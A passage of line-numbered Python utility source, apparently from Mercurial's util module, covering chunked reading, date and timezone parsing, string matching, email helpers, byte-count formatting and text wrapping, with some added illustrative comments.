1783 1795 for chunk in chunks:
1784 1796 if len(chunk) > 2**20:
1785 1797 pos = 0
1786 1798 while pos < len(chunk):
1787 1799 end = pos + 2 ** 18
1788 1800 yield chunk[pos:end]
1789 1801 pos = end
1790 1802 else:
1791 1803 yield chunk
1792 1804 self.iter = splitbig(in_iter)
1793 1805 self._queue = collections.deque()
1794 1806 self._chunkoffset = 0
1795 1807
1796 1808 def read(self, l=None):
1797 1809 """Read L bytes of data from the iterator of chunks of data.
1798 1810 Returns less than L bytes if the iterator runs dry.
1799 1811
1800 1812 If the size parameter is omitted, read everything."""
1801 1813 if l is None:
1802 1814 return ''.join(self.iter)
1803 1815
1804 1816 left = l
1805 1817 buf = []
1806 1818 queue = self._queue
1807 1819 while left > 0:
1808 1820 # refill the queue
1809 1821 if not queue:
1810 1822 target = 2**18
1811 1823 for chunk in self.iter:
1812 1824 queue.append(chunk)
1813 1825 target -= len(chunk)
1814 1826 if target <= 0:
1815 1827 break
1816 1828 if not queue:
1817 1829 break
1818 1830
1819 1831 # The easy way to do this would be to queue.popleft(), modify the
1820 1832 # chunk (if necessary), then queue.appendleft(). However, for cases
1821 1833 # where we read partial chunk content, this incurs 2 dequeue
1822 1834 # mutations and creates a new str for the remaining chunk in the
1823 1835 # queue. Our code below avoids this overhead.
1824 1836
1825 1837 chunk = queue[0]
1826 1838 chunkl = len(chunk)
1827 1839 offset = self._chunkoffset
1828 1840
1829 1841 # Use full chunk.
1830 1842 if offset == 0 and left >= chunkl:
1831 1843 left -= chunkl
1832 1844 queue.popleft()
1833 1845 buf.append(chunk)
1834 1846 # self._chunkoffset remains at 0.
1835 1847 continue
1836 1848
1837 1849 chunkremaining = chunkl - offset
1838 1850
1839 1851 # Use all of unconsumed part of chunk.
1840 1852 if left >= chunkremaining:
1841 1853 left -= chunkremaining
1842 1854 queue.popleft()
1843 1855 # the offset == 0 case is handled by the block above, so offset > 0
1844 1856 # here and this won't merely copy via ``chunk[0:]``.
1845 1857 buf.append(chunk[offset:])
1846 1858 self._chunkoffset = 0
1847 1859
1848 1860 # Partial chunk needed.
1849 1861 else:
1850 1862 buf.append(chunk[offset:offset + left])
1851 1863 self._chunkoffset += left
1852 1864 left -= chunkremaining
1853 1865
1854 1866 return ''.join(buf)
1855 1867
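# Doctest-style sketch of chunkbuffer (illustrative, not in the test suite):
# reads of any size are served from input chunks of any size.
#
#   >>> cb = chunkbuffer(iter(['abc', 'defg']))
#   >>> cb.read(2)
#   'ab'
#   >>> cb.read(5)
#   'cdefg'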
1856 1868 def filechunkiter(f, size=131072, limit=None):
1857 1869 """Create a generator that produces the data in the file size
1858 1870 (default 131072) bytes at a time, up to optional limit (default is
1859 1871 to read all data). Chunks may be less than size bytes if the
1860 1872 chunk is the last chunk in the file, or the file is a socket or
1861 1873 some other type of file that sometimes reads less data than is
1862 1874 requested."""
1863 1875 assert size >= 0
1864 1876 assert limit is None or limit >= 0
1865 1877 while True:
1866 1878 if limit is None:
1867 1879 nbytes = size
1868 1880 else:
1869 1881 nbytes = min(limit, size)
1870 1882 s = nbytes and f.read(nbytes)
1871 1883 if not s:
1872 1884 break
1873 1885 if limit:
1874 1886 limit -= len(s)
1875 1887 yield s
1876 1888
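# Sketch of a typical use (hypothetical 'path' variable): hash a file in
# bounded-size chunks instead of reading it into memory at once.
#
#   h = hashlib.sha1()
#   with open(path, 'rb') as fp:
#       for chunk in filechunkiter(fp, size=65536):
#           h.update(chunk)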
1877 1889 def makedate(timestamp=None):
1878 1890 '''Return a unix timestamp (or the current time) as a (unixtime,
1879 1891 offset) tuple based on the local timezone.'''
1880 1892 if timestamp is None:
1881 1893 timestamp = time.time()
1882 1894 if timestamp < 0:
1883 1895 hint = _("check your clock")
1884 1896 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1885 1897 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1886 1898 datetime.datetime.fromtimestamp(timestamp))
1887 1899 tz = delta.days * 86400 + delta.seconds
1888 1900 return timestamp, tz
1889 1901
1890 1902 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1891 1903 """represent a (unixtime, offset) tuple as a localized time.
1892 1904 unixtime is seconds since the epoch, and offset is the time zone's
1893 1905 number of seconds away from UTC.
1894 1906
1895 1907 >>> datestr((0, 0))
1896 1908 'Thu Jan 01 00:00:00 1970 +0000'
1897 1909 >>> datestr((42, 0))
1898 1910 'Thu Jan 01 00:00:42 1970 +0000'
1899 1911 >>> datestr((-42, 0))
1900 1912 'Wed Dec 31 23:59:18 1969 +0000'
1901 1913 >>> datestr((0x7fffffff, 0))
1902 1914 'Tue Jan 19 03:14:07 2038 +0000'
1903 1915 >>> datestr((-0x80000000, 0))
1904 1916 'Fri Dec 13 20:45:52 1901 +0000'
1905 1917 """
1906 1918 t, tz = date or makedate()
1907 1919 if "%1" in format or "%2" in format or "%z" in format:
1908 1920 sign = (tz > 0) and "-" or "+"
1909 1921 minutes = abs(tz) // 60
1910 1922 q, r = divmod(minutes, 60)
1911 1923 format = format.replace("%z", "%1%2")
1912 1924 format = format.replace("%1", "%c%02d" % (sign, q))
1913 1925 format = format.replace("%2", "%02d" % r)
1914 1926 d = t - tz
1915 1927 if d > 0x7fffffff:
1916 1928 d = 0x7fffffff
1917 1929 elif d < -0x80000000:
1918 1930 d = -0x80000000
1919 1931 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1920 1932 # because they use the gmtime() system call which is buggy on Windows
1921 1933 # for negative values.
1922 1934 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1923 1935 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1924 1936 return s
1925 1937
1926 1938 def shortdate(date=None):
1927 1939 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1928 1940 return datestr(date, format='%Y-%m-%d')
1929 1941
1930 1942 def parsetimezone(s):
1931 1943 """find a trailing timezone, if any, in string, and return a
1932 1944 (offset, remainder) pair"""
1933 1945
1934 1946 if s.endswith("GMT") or s.endswith("UTC"):
1935 1947 return 0, s[:-3].rstrip()
1936 1948
1937 1949 # Unix-style timezones [+-]hhmm
1938 1950 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1939 1951 sign = (s[-5] == "+") and 1 or -1
1940 1952 hours = int(s[-4:-2])
1941 1953 minutes = int(s[-2:])
1942 1954 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1943 1955
1944 1956 # ISO8601 trailing Z
1945 1957 if s.endswith("Z") and s[-2:-1].isdigit():
1946 1958 return 0, s[:-1]
1947 1959
1948 1960 # ISO8601-style [+-]hh:mm
1949 1961 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1950 1962 s[-5:-3].isdigit() and s[-2:].isdigit()):
1951 1963 sign = (s[-6] == "+") and 1 or -1
1952 1964 hours = int(s[-5:-3])
1953 1965 minutes = int(s[-2:])
1954 1966 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1955 1967
1956 1968 return None, s
1957 1969
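# Illustrative values (not in the original doctests): offsets are returned
# in seconds west of UTC, so a trailing "+0530" becomes a negative offset.
#
#   >>> parsetimezone('10:30 GMT')
#   (0, '10:30')
#   >>> parsetimezone('2017-01-01 12:00 +0530')
#   (-19800, '2017-01-01 12:00')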
1958 1970 def strdate(string, format, defaults=None):
1959 1971 """parse a localized time string and return a (unixtime, offset) tuple.
1960 1972 if the string cannot be parsed, ValueError is raised."""
1961 1973 if defaults is None:
1962 1974 defaults = {}
1963 1975
1964 1976 # NOTE: unixtime = localunixtime + offset
1965 1977 offset, date = parsetimezone(string)
1966 1978
1967 1979 # add missing elements from defaults
1968 1980 usenow = False # default to using biased defaults
1969 1981 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1970 1982 part = pycompat.bytestr(part)
1971 1983 found = [True for p in part if ("%"+p) in format]
1972 1984 if not found:
1973 1985 date += "@" + defaults[part][usenow]
1974 1986 format += "@%" + part[0]
1975 1987 else:
1976 1988 # We've found a specific time element, less specific time
1977 1989 # elements are relative to today
1978 1990 usenow = True
1979 1991
1980 1992 timetuple = time.strptime(encoding.strfromlocal(date),
1981 1993 encoding.strfromlocal(format))
1982 1994 localunixtime = int(calendar.timegm(timetuple))
1983 1995 if offset is None:
1984 1996 # local timezone
1985 1997 unixtime = int(time.mktime(timetuple))
1986 1998 offset = unixtime - localunixtime
1987 1999 else:
1988 2000 unixtime = localunixtime + offset
1989 2001 return unixtime, offset
1990 2002
1991 2003 def parsedate(date, formats=None, bias=None):
1992 2004 """parse a localized date/time and return a (unixtime, offset) tuple.
1993 2005
1994 2006 The date may be a "unixtime offset" string or in one of the specified
1995 2007 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1996 2008
1997 2009 >>> parsedate(b' today ') == parsedate(\
1998 2010 datetime.date.today().strftime('%b %d'))
1999 2011 True
2000 2012 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2001 2013 datetime.timedelta(days=1)\
2002 2014 ).strftime('%b %d'))
2003 2015 True
2004 2016 >>> now, tz = makedate()
2005 2017 >>> strnow, strtz = parsedate(b'now')
2006 2018 >>> (strnow - now) < 1
2007 2019 True
2008 2020 >>> tz == strtz
2009 2021 True
2010 2022 """
2011 2023 if bias is None:
2012 2024 bias = {}
2013 2025 if not date:
2014 2026 return 0, 0
2015 2027 if isinstance(date, tuple) and len(date) == 2:
2016 2028 return date
2017 2029 if not formats:
2018 2030 formats = defaultdateformats
2019 2031 date = date.strip()
2020 2032
2021 2033 if date == 'now' or date == _('now'):
2022 2034 return makedate()
2023 2035 if date == 'today' or date == _('today'):
2024 2036 date = datetime.date.today().strftime('%b %d')
2025 2037 elif date == 'yesterday' or date == _('yesterday'):
2026 2038 date = (datetime.date.today() -
2027 2039 datetime.timedelta(days=1)).strftime('%b %d')
2028 2040
2029 2041 try:
2030 2042 when, offset = map(int, date.split(' '))
2031 2043 except ValueError:
2032 2044 # fill out defaults
2033 2045 now = makedate()
2034 2046 defaults = {}
2035 2047 for part in ("d", "mb", "yY", "HI", "M", "S"):
2036 2048 # this piece is for rounding the specific end of unknowns
2037 2049 b = bias.get(part)
2038 2050 if b is None:
2039 2051 if part[0:1] in "HMS":
2040 2052 b = "00"
2041 2053 else:
2042 2054 b = "0"
2043 2055
2044 2056 # this piece is for matching the generic end to today's date
2045 2057 n = datestr(now, "%" + part[0:1])
2046 2058
2047 2059 defaults[part] = (b, n)
2048 2060
2049 2061 for format in formats:
2050 2062 try:
2051 2063 when, offset = strdate(date, format, defaults)
2052 2064 except (ValueError, OverflowError):
2053 2065 pass
2054 2066 else:
2055 2067 break
2056 2068 else:
2057 2069 raise error.ParseError(_('invalid date: %r') % date)
2058 2070 # validate explicit (probably user-specified) date and
2059 2071 # time zone offset. values must fit in signed 32 bits for
2060 2072 # current 32-bit linux runtimes. timezones go from UTC-12
2061 2073 # to UTC+14
2062 2074 if when < -0x80000000 or when > 0x7fffffff:
2063 2075 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2064 2076 if offset < -50400 or offset > 43200:
2065 2077 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2066 2078 return when, offset
2067 2079
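# Additional illustrative case (not in the doctests above): a raw
# "unixtime offset" string takes the fast path and is returned as-is
# after range validation.
#
#   >>> parsedate('1500000000 -7200')
#   (1500000000, -7200)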
2068 2080 def matchdate(date):
2069 2081 """Return a function that matches a given date match specifier
2070 2082
2071 2083 Formats include:
2072 2084
2073 2085 '{date}' matches a given date to the accuracy provided
2074 2086
2075 2087 '<{date}' on or before a given date
2076 2088
2077 2089 '>{date}' on or after a given date
2078 2090
2079 2091 >>> p1 = parsedate(b"10:29:59")
2080 2092 >>> p2 = parsedate(b"10:30:00")
2081 2093 >>> p3 = parsedate(b"10:30:59")
2082 2094 >>> p4 = parsedate(b"10:31:00")
2083 2095 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2084 2096 >>> f = matchdate(b"10:30")
2085 2097 >>> f(p1[0])
2086 2098 False
2087 2099 >>> f(p2[0])
2088 2100 True
2089 2101 >>> f(p3[0])
2090 2102 True
2091 2103 >>> f(p4[0])
2092 2104 False
2093 2105 >>> f(p5[0])
2094 2106 False
2095 2107 """
2096 2108
2097 2109 def lower(date):
2098 2110 d = {'mb': "1", 'd': "1"}
2099 2111 return parsedate(date, extendeddateformats, d)[0]
2100 2112
2101 2113 def upper(date):
2102 2114 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2103 2115 for days in ("31", "30", "29"):
2104 2116 try:
2105 2117 d["d"] = days
2106 2118 return parsedate(date, extendeddateformats, d)[0]
2107 2119 except Abort:
2108 2120 pass
2109 2121 d["d"] = "28"
2110 2122 return parsedate(date, extendeddateformats, d)[0]
2111 2123
2112 2124 date = date.strip()
2113 2125
2114 2126 if not date:
2115 2127 raise Abort(_("dates cannot consist entirely of whitespace"))
2116 2128 elif date[0] == "<":
2117 2129 if not date[1:]:
2118 2130 raise Abort(_("invalid day spec, use '<DATE'"))
2119 2131 when = upper(date[1:])
2120 2132 return lambda x: x <= when
2121 2133 elif date[0] == ">":
2122 2134 if not date[1:]:
2123 2135 raise Abort(_("invalid day spec, use '>DATE'"))
2124 2136 when = lower(date[1:])
2125 2137 return lambda x: x >= when
2126 2138 elif date[0] == "-":
2127 2139 try:
2128 2140 days = int(date[1:])
2129 2141 except ValueError:
2130 2142 raise Abort(_("invalid day spec: %s") % date[1:])
2131 2143 if days < 0:
2132 2144 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2133 2145 % date[1:])
2134 2146 when = makedate()[0] - days * 3600 * 24
2135 2147 return lambda x: x >= when
2136 2148 elif " to " in date:
2137 2149 a, b = date.split(" to ")
2138 2150 start, stop = lower(a), upper(b)
2139 2151 return lambda x: x >= start and x <= stop
2140 2152 else:
2141 2153 start, stop = lower(date), upper(date)
2142 2154 return lambda x: x >= start and x <= stop
2143 2155
2144 2156 def stringmatcher(pattern, casesensitive=True):
2145 2157 """
2146 2158 accepts a string, possibly starting with a 're:' or 'literal:' prefix.
2147 2159 returns the matcher name, pattern, and matcher function.
2148 2160 missing or unknown prefixes are treated as literal matches.
2149 2161
2150 2162 helper for tests:
2151 2163 >>> def test(pattern, *tests):
2152 2164 ... kind, pattern, matcher = stringmatcher(pattern)
2153 2165 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 2166 >>> def itest(pattern, *tests):
2155 2167 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2156 2168 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2157 2169
2158 2170 exact matching (no prefix):
2159 2171 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2160 2172 ('literal', 'abcdefg', [False, False, True])
2161 2173
2162 2174 regex matching ('re:' prefix)
2163 2175 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2164 2176 ('re', 'a.+b', [False, False, True])
2165 2177
2166 2178 force exact matches ('literal:' prefix)
2167 2179 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2168 2180 ('literal', 're:foobar', [False, True])
2169 2181
2170 2182 unknown prefixes are ignored and treated as literals
2171 2183 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2172 2184 ('literal', 'foo:bar', [False, False, True])
2173 2185
2174 2186 case insensitive regex matches
2175 2187 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2176 2188 ('re', 'A.+b', [False, False, True])
2177 2189
2178 2190 case insensitive literal matches
2179 2191 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2180 2192 ('literal', 'ABCDEFG', [False, False, True])
2181 2193 """
2182 2194 if pattern.startswith('re:'):
2183 2195 pattern = pattern[3:]
2184 2196 try:
2185 2197 flags = 0
2186 2198 if not casesensitive:
2187 2199 flags = remod.I
2188 2200 regex = remod.compile(pattern, flags)
2189 2201 except remod.error as e:
2190 2202 raise error.ParseError(_('invalid regular expression: %s')
2191 2203 % e)
2192 2204 return 're', pattern, regex.search
2193 2205 elif pattern.startswith('literal:'):
2194 2206 pattern = pattern[8:]
2195 2207
2196 2208 match = pattern.__eq__
2197 2209
2198 2210 if not casesensitive:
2199 2211 ipat = encoding.lower(pattern)
2200 2212 match = lambda s: ipat == encoding.lower(s)
2201 2213 return 'literal', pattern, match
2202 2214
2203 2215 def shortuser(user):
2204 2216 """Return a short representation of a user name or email address."""
2205 2217 f = user.find('@')
2206 2218 if f >= 0:
2207 2219 user = user[:f]
2208 2220 f = user.find('<')
2209 2221 if f >= 0:
2210 2222 user = user[f + 1:]
2211 2223 f = user.find(' ')
2212 2224 if f >= 0:
2213 2225 user = user[:f]
2214 2226 f = user.find('.')
2215 2227 if f >= 0:
2216 2228 user = user[:f]
2217 2229 return user
2218 2230
2219 2231 def emailuser(user):
2220 2232 """Return the user portion of an email address."""
2221 2233 f = user.find('@')
2222 2234 if f >= 0:
2223 2235 user = user[:f]
2224 2236 f = user.find('<')
2225 2237 if f >= 0:
2226 2238 user = user[f + 1:]
2227 2239 return user
2228 2240
2229 2241 def email(author):
2230 2242 '''get email of author.'''
2231 2243 r = author.find('>')
2232 2244 if r == -1:
2233 2245 r = None
2234 2246 return author[author.find('<') + 1:r]
2235 2247
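# Illustrative values for the three helpers above (hypothetical address):
#
#   >>> shortuser('John Doe <john.doe@example.com>')
#   'john'
#   >>> emailuser('John Doe <john.doe@example.com>')
#   'john.doe'
#   >>> email('John Doe <john.doe@example.com>')
#   'john.doe@example.com'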
2236 2248 def ellipsis(text, maxlength=400):
2237 2249 """Trim string to at most maxlength (default: 400) columns in display."""
2238 2250 return encoding.trim(text, maxlength, ellipsis='...')
2239 2251
2240 2252 def unitcountfn(*unittable):
2241 2253 '''return a function that renders a readable count of some quantity'''
2242 2254
2243 2255 def go(count):
2244 2256 for multiplier, divisor, format in unittable:
2245 2257 if abs(count) >= divisor * multiplier:
2246 2258 return format % (count / float(divisor))
2247 2259 return unittable[-1][2] % count
2248 2260
2249 2261 return go
2250 2262
2251 2263 def processlinerange(fromline, toline):
2252 2264 """Check that linerange <fromline>:<toline> makes sense and return a
2253 2265 0-based range.
2254 2266
2255 2267 >>> processlinerange(10, 20)
2256 2268 (9, 20)
2257 2269 >>> processlinerange(2, 1)
2258 2270 Traceback (most recent call last):
2259 2271 ...
2260 2272 ParseError: line range must be positive
2261 2273 >>> processlinerange(0, 5)
2262 2274 Traceback (most recent call last):
2263 2275 ...
2264 2276 ParseError: fromline must be strictly positive
2265 2277 """
2266 2278 if toline - fromline < 0:
2267 2279 raise error.ParseError(_("line range must be positive"))
2268 2280 if fromline < 1:
2269 2281 raise error.ParseError(_("fromline must be strictly positive"))
2270 2282 return fromline - 1, toline
2271 2283
2272 2284 bytecount = unitcountfn(
2273 2285 (100, 1 << 30, _('%.0f GB')),
2274 2286 (10, 1 << 30, _('%.1f GB')),
2275 2287 (1, 1 << 30, _('%.2f GB')),
2276 2288 (100, 1 << 20, _('%.0f MB')),
2277 2289 (10, 1 << 20, _('%.1f MB')),
2278 2290 (1, 1 << 20, _('%.2f MB')),
2279 2291 (100, 1 << 10, _('%.0f KB')),
2280 2292 (10, 1 << 10, _('%.1f KB')),
2281 2293 (1, 1 << 10, _('%.2f KB')),
2282 2294 (1, 1, _('%.0f bytes')),
2283 2295 )
2284 2296
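# Illustrative outputs of bytecount (assuming the untranslated format
# strings): the first row whose threshold is met wins, so displayed
# precision decreases as the magnitude grows.
#
#   >>> bytecount(2252)
#   '2.20 KB'
#   >>> bytecount(100 * (1 << 20))
#   '100 MB'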
2285 2297 # Matches a single EOL which can either be a CRLF where repeated CR
2286 2298 # are removed or a LF. We do not care about old Macintosh files, so a
2287 2299 # stray CR is an error.
2288 2300 _eolre = remod.compile(br'\r*\n')
2289 2301
2290 2302 def tolf(s):
2291 2303 return _eolre.sub('\n', s)
2292 2304
2293 2305 def tocrlf(s):
2294 2306 return _eolre.sub('\r\n', s)
2295 2307
2296 2308 if pycompat.oslinesep == '\r\n':
2297 2309 tonativeeol = tocrlf
2298 2310 fromnativeeol = tolf
2299 2311 else:
2300 2312 tonativeeol = pycompat.identity
2301 2313 fromnativeeol = pycompat.identity
2302 2314
2303 2315 def escapestr(s):
2304 2316 # call underlying function of s.encode('string_escape') directly for
2305 2317 # Python 3 compatibility
2306 2318 return codecs.escape_encode(s)[0]
2307 2319
2308 2320 def unescapestr(s):
2309 2321 return codecs.escape_decode(s)[0]
2310 2322
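# Illustrative round trip (both functions operate on byte strings):
#
#   escapestr('a\nb')    -> 'a\\nb'   (newline becomes backslash-n)
#   unescapestr('a\\nb') -> 'a\nb'    (and back)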
2311 2323 def forcebytestr(obj):
2312 2324 """Portably format an arbitrary object (e.g. exception) into a byte
2313 2325 string."""
2314 2326 try:
2315 2327 return pycompat.bytestr(obj)
2316 2328 except UnicodeEncodeError:
2317 2329 # non-ascii string, may be lossy
2318 2330 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319 2331
2320 2332 def uirepr(s):
2321 2333 # Avoid double backslash in Windows path repr()
2322 2334 return repr(s).replace('\\\\', '\\')
2323 2335
2324 2336 # delay import of textwrap
2325 2337 def MBTextWrapper(**kwargs):
2326 2338 class tw(textwrap.TextWrapper):
2327 2339 """
2328 2340 Extend TextWrapper for width-awareness.
2329 2341
2330 2342 Neither the number of 'bytes' in any encoding nor the number of
2331 2343 'characters' is appropriate for calculating terminal columns of a given string.
2332 2344
2333 2345 The original TextWrapper implementation uses the built-in 'len()' directly,
2334 2346 so overriding is needed to use the width information of each character.
2335 2347
2336 2348 In addition, characters classified as 'ambiguous' width are
2337 2349 treated as wide in East Asian locales, but as narrow elsewhere.
2338 2350
2339 2351 This requires a user decision to determine the width of such characters.
2340 2352 """
2341 2353 def _cutdown(self, ucstr, space_left):
2342 2354 l = 0
2343 2355 colwidth = encoding.ucolwidth
2344 2356 for i in xrange(len(ucstr)):
2345 2357 l += colwidth(ucstr[i])
2346 2358 if space_left < l:
2347 2359 return (ucstr[:i], ucstr[i:])
2348 2360 return ucstr, ''
2349 2361
2350 2362 # overriding of base class
2351 2363 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2352 2364 space_left = max(width - cur_len, 1)
2353 2365
2354 2366 if self.break_long_words:
2355 2367 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2356 2368 cur_line.append(cut)
2357 2369 reversed_chunks[-1] = res
2358 2370 elif not cur_line:
2359 2371 cur_line.append(reversed_chunks.pop())
2360 2372
2361 2373 # this overriding code is imported from TextWrapper of Python 2.6
2362 2374 # to calculate columns of string by 'encoding.ucolwidth()'
2363 2375 def _wrap_chunks(self, chunks):
2364 2376 colwidth = encoding.ucolwidth
2365 2377
2366 2378 lines = []
2367 2379 if self.width <= 0:
2368 2380 raise ValueError("invalid width %r (must be > 0)" % self.width)
2369 2381
2370 2382 # Arrange in reverse order so items can be efficiently popped
2371 2383 # from a stack of chunks.
2372 2384 chunks.reverse()
2373 2385
2374 2386 while chunks:
2375 2387
2376 2388 # Start the list of chunks that will make up the current line.
2377 2389 # cur_len is just the length of all the chunks in cur_line.
2378 2390 cur_line = []
2379 2391 cur_len = 0
2380 2392
2381 2393 # Figure out which static string will prefix this line.
2382 2394 if lines:
2383 2395 indent = self.subsequent_indent
2384 2396 else:
2385 2397 indent = self.initial_indent
2386 2398
2387 2399 # Maximum width for this line.
2388 2400 width = self.width - len(indent)
2389 2401
2390 2402 # First chunk on line is whitespace -- drop it, unless this
2391 2403 # is the very beginning of the text (i.e. no lines started yet).
2392 2404 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2393 2405 del chunks[-1]
2394 2406
2395 2407 while chunks:
2396 2408 l = colwidth(chunks[-1])
2397 2409
2398 2410 # Can at least squeeze this chunk onto the current line.
2399 2411 if cur_len + l <= width:
2400 2412 cur_line.append(chunks.pop())
2401 2413 cur_len += l
2402 2414
2403 2415 # Nope, this line is full.
2404 2416 else:
2405 2417 break
2406 2418
2407 2419 # The current line is full, and the next chunk is too big to
2408 2420 # fit on *any* line (not just this one).
2409 2421 if chunks and colwidth(chunks[-1]) > width:
2410 2422 self._handle_long_word(chunks, cur_line, cur_len, width)
2411 2423
2412 2424 # If the last chunk on this line is all whitespace, drop it.
2413 2425 if (self.drop_whitespace and
2414 2426 cur_line and cur_line[-1].strip() == r''):
2415 2427 del cur_line[-1]
2416 2428
2417 2429 # Convert current line back to a string and store it in list
2418 2430 # of all lines (return value).
2419 2431 if cur_line:
2420 2432 lines.append(indent + r''.join(cur_line))
2421 2433
2422 2434 return lines
2423 2435
2424 2436 global MBTextWrapper
2425 2437 MBTextWrapper = tw
2426 2438 return tw(**kwargs)
2427 2439
2428 2440 def wrap(line, width, initindent='', hangindent=''):
2429 2441 maxindent = max(len(hangindent), len(initindent))
2430 2442 if width <= maxindent:
2431 2443 # adjust for weird terminal size
2432 2444 width = max(78, maxindent + 1)
2433 2445 line = line.decode(pycompat.sysstr(encoding.encoding),
2434 2446 pycompat.sysstr(encoding.encodingmode))
2435 2447 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2436 2448 pycompat.sysstr(encoding.encodingmode))
2437 2449 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2438 2450 pycompat.sysstr(encoding.encodingmode))
2439 2451 wrapper = MBTextWrapper(width=width,
2440 2452 initial_indent=initindent,
2441 2453 subsequent_indent=hangindent)
2442 2454 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443 2455
2444 2456 if (pyplatform.python_implementation() == 'CPython' and
2445 2457 sys.version_info < (3, 0)):
2446 2458 # There is an issue in CPython that some IO methods do not handle EINTR
2447 2459 # correctly. The following table shows what CPython version (and functions)
2448 2460 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 2461 #
2450 2462 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 2463 # --------------------------------------------------
2452 2464 # fp.__iter__ | buggy | buggy | okay
2453 2465 # fp.read* | buggy | okay [1] | okay
2454 2466 #
2455 2467 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 2468 #
2457 2469 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2458 2470 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 2471 #
2460 2472 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2461 2473 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 2474 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 2475 # fp.__iter__ but not other fp.read* methods.
2464 2476 #
2465 2477 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 2478 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 2479 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 2480 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 2481 # to minimize the performance impact.
2470 2482 if sys.version_info >= (2, 7, 4):
2471 2483 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 2484 def _safeiterfile(fp):
2473 2485 return iter(fp.readline, '')
2474 2486 else:
2475 2487 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 2488 # note: this may block longer than necessary because of bufsize.
2477 2489 def _safeiterfile(fp, bufsize=4096):
2478 2490 fd = fp.fileno()
2479 2491 line = ''
2480 2492 while True:
2481 2493 try:
2482 2494 buf = os.read(fd, bufsize)
2483 2495 except OSError as ex:
2484 2496 # os.read only raises EINTR before any data is read
2485 2497 if ex.errno == errno.EINTR:
2486 2498 continue
2487 2499 else:
2488 2500 raise
2489 2501 line += buf
2490 2502 if '\n' in buf:
2491 2503 splitted = line.splitlines(True)
2492 2504 line = ''
2493 2505 for l in splitted:
2494 2506 if l[-1] == '\n':
2495 2507 yield l
2496 2508 else:
2497 2509 line = l
2498 2510 if not buf:
2499 2511 break
2500 2512 if line:
2501 2513 yield line
2502 2514
2503 2515 def iterfile(fp):
2504 2516 fastpath = True
2505 2517 if type(fp) is file:
2506 2518 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 2519 if fastpath:
2508 2520 return fp
2509 2521 else:
2510 2522 return _safeiterfile(fp)
2511 2523 else:
2512 2524 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 2525 def iterfile(fp):
2514 2526 return fp
2515 2527
2516 2528 def iterlines(iterator):
2517 2529 for chunk in iterator:
2518 2530 for line in chunk.splitlines():
2519 2531 yield line
2520 2532
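# Illustrative sketch: iterlines flattens an iterator of multi-line chunks
# into individual lines (without trailing newlines).
#
#   >>> list(iterlines(['ab\ncd\n', 'ef']))
#   ['ab', 'cd', 'ef']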
2521 2533 def expandpath(path):
2522 2534 return os.path.expanduser(os.path.expandvars(path))
2523 2535
2524 2536 def hgcmd():
2525 2537 """Return the command used to execute current hg
2526 2538
2527 2539 This is different from hgexecutable() because on Windows we want
2528 2540 to avoid things opening new shell windows like batch files, so we
2529 2541 get either the python call or current executable.
2530 2542 """
2531 2543 if mainfrozen():
2532 2544 if getattr(sys, 'frozen', None) == 'macosx_app':
2533 2545 # Env variable set by py2app
2534 2546 return [encoding.environ['EXECUTABLEPATH']]
2535 2547 else:
2536 2548 return [pycompat.sysexecutable]
2537 2549 return gethgcmd()
2538 2550
2539 2551 def rundetached(args, condfn):
2540 2552 """Execute the argument list in a detached process.
2541 2553
2542 2554 condfn is a callable which is called repeatedly and should return
2543 2555 True once the child process is known to have started successfully.
2544 2556 At this point, the child process PID is returned. If the child
2545 2557 process fails to start or finishes before condfn() evaluates to
2546 2558 True, return -1.
2547 2559 """
2548 2560 # Windows case is easier because the child process is either
2549 2561 # successfully starting and validating the condition or exiting
2550 2562 # on failure. We just poll on its PID. On Unix, if the child
